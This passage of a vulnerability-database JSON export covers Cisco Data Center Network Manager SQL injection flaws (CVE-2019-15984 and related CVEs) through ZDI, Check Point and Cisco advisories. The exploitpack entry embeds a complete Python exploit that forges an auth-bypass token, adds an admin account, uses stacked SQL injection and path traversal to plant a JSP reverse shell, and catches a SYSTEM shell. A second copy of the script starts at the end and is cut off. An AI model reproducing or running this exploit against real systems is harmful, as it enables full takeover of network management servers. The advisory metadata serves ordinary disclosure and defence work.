"https://www.zerodayinitiative.com/advisories/ZDI-20-021/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getNpvLinkStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getNpvLinkStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-076", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-076/", "cvss": {"score": 
9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/config/delivery/history service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDeployerTaskDetails SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-059", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-059/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:22", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/inventory/zones service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanZoneList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-064", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-064/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, 
{"lastseen": "2022-01-31T22:10:55", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the tasks endpoint. When parsing the filterStr parameter in the getGirTaskLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getGirTaskLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-109", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-109/", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:44", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing a packet to the getIslList SOAP endpoint, the process does not properly validate a user-supplied string for the sortType parameter before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-037", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-037/", "cvss": 
{"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:15:28", "description": "An SQL injection vulnerability exists in Cisco Data Center Network Manager. The vulnerability is due to insufficient input validation when processing HTTP requests in the Java class smartLicensingController.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Data Center Network Manager SQL Injection (CVE-2019-15984)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-05-10T00:00:00", "id": "CPAI-2019-2093", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T20:39:49", "description": "\nCisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-06T00:00:00", "type": "exploitpack", "title": "Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "EXPLOITPACK:F778AD5D626855F4BE149B4B8F57874E", "href": "", "sourceData": "#!/usr/bin/python\n\"\"\"\nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability\n\nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)\n- Release: 11.2(1)\n- Release Date: 18-Jun-2019\n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip\n- Size: 1619.36 MB (1698022100 bytes)\n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \n\nBug 1: CVE-2019-15976 / ZDI-20-008\nBug 2: CVE-2019-15984 / ZDI-20-060\n\nExample:\n========\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <connectback>\n(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337\n\nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337\n(+) created the account hacker:Hacked123\n(+) created the 1337/custom path!\n(+) leaked vfs! 
temp230cf31722794196/content-ed98b5003b1c695c\n(+) SQL Injection working!\n(+) wrote the si.jsp shell!\n(+) cleaned up the database!\n(+) starting handler on port 1337\n(+) connection from 192.168.100.122\n(+) pop thy shell!\nMicrosoft Windows [Version 6.3.9600]\n(c) 2013 Microsoft Corporation. All rights reserved.\n\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami\nwhoami\nnt authority\\system\n\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>\n\nClean Up:\n=========\n\n1. delete from xmlDocs where user_name = '1337';\n2. delete si.jsp from the web root\n3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337\n\"\"\"\n\nimport re\nimport md5\nimport sys\nimport time\nimport socket\nimport base64\nimport requests\nimport telnetlib\nfrom threading import Thread\nfrom xml.etree import ElementTree\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_jsp(cbh, cbp):\n \"\"\" get me some jsp for a connectback! 
\"\"\"\n jsp = \"\"\"\n <%%@page import=\"java.lang.*\"%%>\n <%%@page import=\"java.util.*\"%%>\n <%%@page import=\"java.io.*\"%%>\n <%%@page import=\"java.net.*\"%%>\n\n <%%\n // clean up\n String[] files = {\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\",\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\",\n };\n for (String s:files){ File f = new File(s); f.delete(); }\n File f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\")));\n f.delete();\n class StreamConnector extends Thread\n {\n InputStream we;\n OutputStream uo;\n\n StreamConnector( InputStream we, OutputStream uo )\n {\n this.we = we;\n this.uo = uo;\n }\n\n public void run()\n {\n BufferedReader dy = null;\n BufferedWriter zvi = null;\n try\n {\n dy = new BufferedReader( new InputStreamReader( this.we ) );\n zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );\n char buffer[] = new char[8192];\n int length;\n while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )\n {\n zvi.write( buffer, 0, length );\n zvi.flush();\n }\n } catch( Exception e ){}\n try\n {\n if( dy != null )\n dy.close();\n if( zvi != null )\n zvi.close();\n } catch( Exception e ){}\n }\n }\n\n try\n {\n String ShellPath;\n ShellPath = new String(\"cmd.exe\");\n Socket socket = new Socket( \"%s\", %s);\n Process process = Runtime.getRuntime().exec( ShellPath );\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\n } catch( Exception e ) {}\n %%>\n \"\"\" % (cbh, cbp)\n return jsp\n\ndef get_session(target, user, password):\n \"\"\" we have bypassed auth at this point and created an admin \"\"\"\n d = {\n \"j_username\" : user,\n \"j_password\" : password\n }\n uri = \"https://%s/j_spring_security_check\" % target\n r = requests.post(uri, data=d, 
verify=False, allow_redirects=False)\n if \"Set-Cookie\" in r.headers:\n match = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"])\n if match:\n sessionid = match.group(1)\n resttoken = match.group(2)\n return { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken}\n return False\n\ndef craft_soap_header():\n soap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n soap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken()\n soap_header += '\\t</SOAP-ENV:Header>'\n return soap_header\n\ndef we_can_trigger_folder_path_creation(target):\n \"\"\" craft the path location and db entry for the traversal \"\"\"\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:saveReportTemplate>'\n soap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>'\n soap_body += '\\t\\t\\t<userName>1337</userName>'\n soap_body += '\\t\\t\\t<updatedAttrs></updatedAttrs>'\n soap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>'\n soap_body += '\\t\\t</ep:saveReportTemplate>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/ReportWSService/ReportWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_trigger_second_order_write(target, shellpath):\n \"\"\" trigger the traversal \"\"\"\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:openReportTemplate>'\n 
soap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath\n soap_body += '\\t\\t\\t<userName>1337</userName>'\n soap_body += '\\t\\t</ep:openReportTemplate>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/ReportWSService/ReportWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef gen_ssotoken():\n \"\"\" auth bypass \"\"\"\n timestamp = 9999999999999 # we live forever\n username = \"hax\" # doesnt even need to exist!\n sessionid = 1337 # doesnt even need to exist!\n d = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp)\n return \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)\n\ndef we_can_trigger_sql_injection(target, sql):\n \"\"\" stacked sqli primitive \"\"\"\n sqli = \";%s--\" % sql\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:getVmHostData>'\n soap_body += '\\t\\t\\t<arg0>'\n soap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>'\n soap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli\n soap_body += '\\t\\t\\t</arg0>'\n soap_body += '\\t\\t\\t<arg1></arg1>'\n soap_body += '\\t\\t\\t<arg2></arg2>'\n soap_body += '\\t\\t\\t<arg3>false</arg3>'\n soap_body += '\\t\\t</ep:getVmHostData>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_leak_vfs(target):\n \"\"\" we use a information disclosure for the vfs path \"\"\"\n global vfs\n uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target\n c 
= requests.auth.HTTPBasicAuth('admin', 'nbv_12345')\n r = requests.get(uri, verify=False, auth=c)\n match = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text)\n if match:\n vfs = str(match.group(1).replace(\"\\\\\",\"/\"))\n return True\n return False\n\ndef handler(lp):\n \"\"\" this is the client handler, to catch the connectback \"\"\"\n print \"(+) starting handler on port %d\" % lp\n t = telnetlib.Telnet()\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((\"0.0.0.0\", lp))\n s.listen(1)\n conn, addr = s.accept()\n print \"(+) connection from %s\" % addr[0]\n t.sock = conn\n print \"(+) pop thy shell!\"\n t.interact()\n\ndef exec_code(t, usr, pwd, cbp):\n \"\"\" this function threads the client handler and sends off the attacking payload \"\"\"\n handlerthr = Thread(target=handler, args=(int(cbp),))\n handlerthr.start()\n r = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False)\n\ndef we_can_add_user(target, usr, pwd):\n \"\"\" add a user so that we can reach our backdoor! 
\"\"\"\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:addUser>'\n soap_body += '\\t\\t\\t<userName>%s</userName>' % usr\n soap_body += '\\t\\t\\t<password>%s</password>' % pwd\n soap_body += '\\t\\t\\t<roleName>global-admin</roleName>'\n soap_body += '\\t\\t\\t<enablePwdExpiration>false</enablePwdExpiration>'\n soap_body += '\\t\\t</ep:addUser>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/DbAdminWSService/DbAdminWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n tree = ElementTree.fromstring(r.content)\n for elem in tree.iter():\n if elem.tag == \"resultMessage\":\n res = elem.text\n if res == \"Success\":\n return True\n elif res == \"User already exists.\":\n return True\n return False\n\ndef main():\n\n usr = \"hacker\"\n pwd = \"Hacked123\"\n\n if len(sys.argv) != 3:\n print \"(+) usage: %s <target> <connectback>\" % sys.argv[0]\n print \"(+) eg: %s 192.168.100.122 192.168.100.59:1337\" % sys.argv[0]\n sys.exit(1)\n\n t = sys.argv[1]\n c = sys.argv[2]\n\n cbh = c.split(\":\")[0]\n cbp = c.split(\":\")[1]\n sc = _get_jsp(cbh, cbp).encode(\"hex\")\n\n # stage 1 - add a user\n if we_can_add_user(t, usr, pwd):\n print \"(+) created the account %s:%s\" % (usr, pwd)\n\n # stage 2 - trigger folder creation and db entry\n if we_can_trigger_folder_path_creation(t):\n print \"(+) created the 1337/custom path!\"\n\n # stage 3 - leak the vfs path (not really required I suppose)\n if we_can_leak_vfs(t):\n print \"(+) leaked vfs! 
%s\" % vfs\n\n # stage 4 - trigger the sql injection to update our template entry\n sp = \"../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp\" % vfs\n sql = \"update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';\" % (sp, sc)\n if we_can_trigger_sql_injection(t, sql):\n print \"(+) SQL Injection working!\"\n\n # stage 5 - trigger the shell write\n if we_can_trigger_second_order_write(t, sp):\n print \"(+) wrote the si.jsp shell!\"\n\n # stage 6 - cleanup\n sql = \"delete from xmldocs where user_name='1337';\"\n if we_can_trigger_sql_injection(t, sql):\n print \"(+) cleaned up the database!\"\n\n # stage 7 - go get some rce\n exec_code(t, usr, pwd, cbp)\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-02-06T22:56:51", "description": "", "cvss3": {}, "published": "2020-02-06T00:00:00", "type": "packetstorm", "title": "Cisco Data Center Network Manager 11.2.1 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "PACKETSTORM:156239", "href": "https://packetstormsecurity.com/files/156239/Cisco-Data-Center-Network-Manager-11.2.1-SQL-Injection.html",
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156239/cdcnm1121-sql.txt"}], "cisco": [{"lastseen": "2023-03-02T20:27:07", "description": "Multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. To exploit these vulnerabilities, an attacker would need administrative privileges on the DCNM application.\n\nFor more information about these vulnerabilities, see the Details section of this advisory.\n\nNote: The severity of these vulnerabilities is aggravated by the vulnerabilities described in the Cisco Data Center Network Manager Authentication Bypass Vulnerabilities [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass\"] advisory, published simultaneously with this one.\n\nCisco has released software updates that address these vulnerabilities. 
There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject\"]", "cvss3": {}, "published": "2020-01-02T16:00:00", "type": "cisco", "title": "Cisco Data Center Network Manager SQL Injection Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-15984", "CVE-2019-15985"], "modified": "2020-01-15T15:57:59", "id": "CISCO-SA-20200102-DCNM-SQL-INJECT", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject", "cvss": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}}], "zdt": [{"lastseen": "2020-02-07T01:08:55", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2020-02-06T00:00:00", "type": "zdt", "title": "Cisco Data Center Network Manager 11.2.1 - (getVmHostData) SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "1337DAY-ID-33920", "href": "https://0day.today/exploit/description/33920", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability\r\n\r\nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)\r\n- Release: 11.2(1)\r\n- Release Date: 18-Jun-2019\r\n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip\r\n- Size: 1619.36 MB (1698022100 bytes)\r\n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \r\n\r\nBug 1: CVE-2019-15976 / ZDI-20-008\r\nBug 2: CVE-2019-15984 / ZDI-20-060\r\n\r\nExample:\r\n========\r\n\r\nsaturn:~ mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <connectback>\r\n(+) eg: ./poc.py 192.168.100.122 
192.168.100.59:1337\r\n\r\nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337\r\n(+) created the account hacker:Hacked123\r\n(+) created the 1337/custom path!\r\n(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c\r\n(+) SQL Injection working!\r\n(+) wrote the si.jsp shell!\r\n(+) cleaned up the database!\r\n(+) starting handler on port 1337\r\n(+) connection from 192.168.100.122\r\n(+) pop thy shell!\r\nMicrosoft Windows [Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>\r\n\r\nClean Up:\r\n=========\r\n\r\n1. delete from xmlDocs where user_name = '1337';\r\n2. delete si.jsp from the web root\r\n3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337\r\n\"\"\"\r\n\r\nimport re\r\nimport md5\r\nimport sys\r\nimport time\r\nimport socket\r\nimport base64\r\nimport requests\r\nimport telnetlib\r\nfrom threading import Thread\r\nfrom xml.etree import ElementTree\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\ndef _get_jsp(cbh, cbp):\r\n \"\"\" get me some jsp for a connectback! 
